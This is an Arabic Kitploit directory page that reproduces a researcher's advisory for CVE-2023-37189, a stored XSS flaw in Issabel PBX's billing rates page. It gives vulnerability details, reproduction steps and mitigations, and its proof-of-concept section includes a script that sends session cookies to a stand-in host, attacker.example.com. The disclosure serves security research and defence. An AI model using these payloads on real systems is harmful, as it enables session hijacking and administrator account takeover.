Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-37189 — توجد ثغرة تخزين البرمجة النصية عبر المواقع (XSS) في إصدار Issabel PBX 4.0.0-6 ضمن صفحة إدارة معدّلات الفوترة (index.php?menu=billing_rates). | Kitploit
أدوات/GitHubGitHub/sahiloj/cve-2023-37189
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubsahiloj/cve-2023-37189

CVE-2023-37189

توجد ثغرة تخزين البرمجة النصية عبر المواقع (XSS) في إصدار Issabel PBX 4.0.0-6 ضمن صفحة إدارة معدّلات الفوترة (index.php?menu=billing_rates).

عرض المستودع
11منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-37189 — Issabel PBX 4.0.0-6 ثغرة تخزين البرمجة النصية عبر المواقع (Stored XSS)

CVE Severity Type Vendor


نظرة عامة

الحقلالتفاصيل
معرف CVECVE-2023-37189
نوع الثغرةتخزين البرمجة النصية عبر المواقع (Stored XSS)
المنتج المتأثرIssabel PBX 4.0.0-6
الرابط المتأثرindex.php?menu=billing_rates
الحقول القابلة للاستغلالحقلا Name و Prefix في وحدة Create New Rate
الخطورةمتوسطة (CVSS 3.1 Base Score: 6.1 — AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)
تاريخ الإبلاغ07 يوليو 2023
اكتشفهاSahil Ojha
بيئة الاختبارWindows
الصفحة الرسمية للمنتجhttps://www.issabel.org/
مصدر البرنامجhttps://github.com/IssabelFoundation/issabelPBX

الوصف

توجد ثغرة تخزين البرمجة النصية عبر المواقع (Stored XSS) في Issabel PBX الإصدار 4.0.0-6 ضمن صفحة إدارة أسعار الفوترة (index.php?menu=billing_rates).

يُعد Issabel PBX منصة اتصالات موحّدة مفتوحة المصدر واسعة الاستخدام، مبنية على FreePBX/Asterisk. تتيح ميزة Billing → Rates للمسؤولين تعريف أسعار المكالمات بحقل Name وحقل Prefix مخصصين. نتيجةً لعدم كفاية تعقيم المدخلات وترميز المخرجات، يمكن لمهاجم مصادق حقن HTML أو JavaScript عشوائي في أيٍّ من الحقلين. يتم بعد ذلك تخزين البرنامج النصي الخبيث بشكل دائم في قاعدة بيانات التطبيق وتنفيذه تلقائيًا في متصفح أي مستخدم يزور صفحة Rates لاحقًا — بما في ذلك المسؤولون الآخرون — دون أي تفاعل إضافي.

هذا النوع من الثغرات خطير بشكل خاص في لوحات الإدارة للأسباب التالية:

  • يمكن استخدامه لـاختطاف ملفات تعريف الارتباط (Session Cookies) الخاصة بالمسؤولين الآخرين، مما يؤدي إلى الاستيلاء الكامل على الحسابات.
  • يتيح تنفيذ هجمات التصيد عن طريق تعديل مظهر الصفحة المعروضة للضحايا.
  • قد يُسهّل سرقة رموز CSRF، أو تسجيل ضغطات المفاتيح، أو إعادة التوجيه إلى مواقع خبيثة.
  • يظل الحمول (Payload) نشطًا حتى يتم إزالته صراحةً، مما يعني أنه يمكن أن يؤثر على عدد غير محدود من الضحايا بمرور الوقت.

تفاصيل الثغرة

  • تصنيف الثغرة: تخزين (مستمر) للبرمجة النصية عبر المواقع (CWE-79)
  • متجه الهجوم: شبكة (Network)
  • المصادقة المطلوبة: نعم (مستخدم مصادق بصلاحيات منخفضة أو حساب مسؤول)
  • تفاعل المستخدم: مطلوب (يجب أن يزور الضحية صفحة Billing Rates)
  • النطاق (Scope): متغيّر (يمكن للمهاجم التأثير على جلسات متصفح المستخدمين الآخرين)
  • السبب الجذري: غياب ترميز HTML / تعقيم المخرجات على الحقلين Name و Prefix عند عرض القيم المخزنة مرة أخرى في الصفحة.

إثبات المفهوم (Proof of Concept)

الحمولات التالية، عند إدخالها في حقل Name أو Prefix في نموذج Create New Rate، تُظهر الثغرة:

تنبيه أساسي (اختبار الوظيفة):

root@kitploit:~
<script>alert('XSS')</script>

سرقة ملف تعريف الارتباط للجلسة (استبدل attacker.example.com بخادم تملكه ومصرّح لك باستخدامه — لا تستهدف أبدًا مستخدمين أو أنظمة حقيقية):

root@kitploit:~
<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>

حمول قائم على حدث onerror للصور (لتجاوز جدار الحماية WAF):

root@kitploit:~

⚠️ ملاحظة: هذه الحمولات مقدمة لأغراض تعليمية وبحوث أمنية فقط. احصل دائمًا على إذن كتابي صريح قبل الاختبار على أي نظام لا تملكه.


خطوات إعادة الإنتاج

  1. سجّل الدخول إلى واجهة الويب الخاصة بـ Issabel PBX باستخدام حساب مسؤول.

  2. انتقل إلى Reports → Billing → Rates (الرابط: index.php?menu=billing_rates).

  3. انقر على "Create New Rate" وأدخل حمول XSS مُعدًّا في حقل Prefix أو Name.

    الخطوة 2 – حقن الحمول في حقلي Name/Prefix

  4. انقر على Save. يتم الآن تخزين الحمول في قاعدة البيانات.

  5. أي مستخدم (بما في ذلك المسؤولون الآخرون) يزور صفحة Billing Rates سيتم تنفيذ البرنامج النصي تلقائيًا في متصفحه.

    الخطوة 3 – تنفيذ الحمول عند تحميل الصفحة

    الخطوة 3 – التقاط ملف تعريف ارتباط الجلسة


الأثر

  • اختطاف الجلسة: يمكن للمهاجمين سرقة ملفات تعريف الارتباط للجلسة وانتحال شخصية مستخدمين أو مسؤولين آخرين.
  • تصعيد الامتيازات: من خلال اختطاف جلسة مسؤول، يمكن لمهاجم بصلاحيات منخفضة الحصول على تحكم إداري كامل.
  • سرقة البيانات: يمكن استخراج المعلومات الحساسة الظاهرة على الصفحة بصمت.
  • باب خلفي دائم: يظل الحمول نشطًا حتى يتم إزالته يدويًا، مما يجعله تهديدًا مستمرًا.

التخفيف / المعالجة

يُنصح البائع ومسؤولو الأنظمة بتطبيق الإجراءات المضادة التالية:

  1. ترميز المخرجات: طبق ترميز HTML مراعيًا للسياق عند عرض القيم المخزنة مرة أخرى في صفحة HTML (على سبيل المثال، استخدام htmlspecialchars() في PHP مع ENT_QUOTES). هذا هو الدفاع الأساسي والأكثر موثوقية ضد XSS.
  2. التحقق من المدخلات: كإجراء دفاعي ثانوي (Defense-in-Depth)، ارفض أو عقّم المدخلات التي يقدمها المستخدم على الخادم. قم بإزالة أو ترميز الأحرف الخاصة في HTML (<, >, ", ', &) قبل تخزين البيانات. لاحظ أن التحقق من المدخلات وحده يمكن تجاوزه ولا ينبغي الاعتماد عليه كإجراء وحيد.
  3. سياسة أمان المحتوى (CSP): نشر ترويسة HTTP صارمة Content-Security-Policy لتقييد تنفيذ البرامج النصية المضمّنة (Inline Scripts).
  4. جدار حماية تطبيقات الويب (WAF): استخدم جدار حماية تطبيقات الويب مع قواعد كشف XSS كإجراء دفاعي إضافي.
  5. تدقيق أمني منتظم: إجراء مراجعات دورية للكود واختبارات اختراق على جميع حقول الإدخال التي يتحكم فيها المستخدم.

المراجع

  • NVD – CVE-2023-37189
  • MITRE CVE – CVE-2023-37189
  • OWASP: Cross-Site Scripting (XSS)
  • CWE-79: Improper Neutralization of Input During Web Page Generation
  • Issabel PBX – Official Website
  • IssabelFoundation/issabelPBX – GitHub

إخلاء مسؤولية

هذا المستودع والمعلومات الواردة فيه مقدمة لأغراض تعليمية وبحوث أمنية فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن المعلومات المقدمة. احصل دائمًا على إذن كتابي صريح من مالك النظام قبل إجراء أي اختبار أمني.


اكتشفها وأبلغ عنها Sahil Ojha

تنزيل الأداة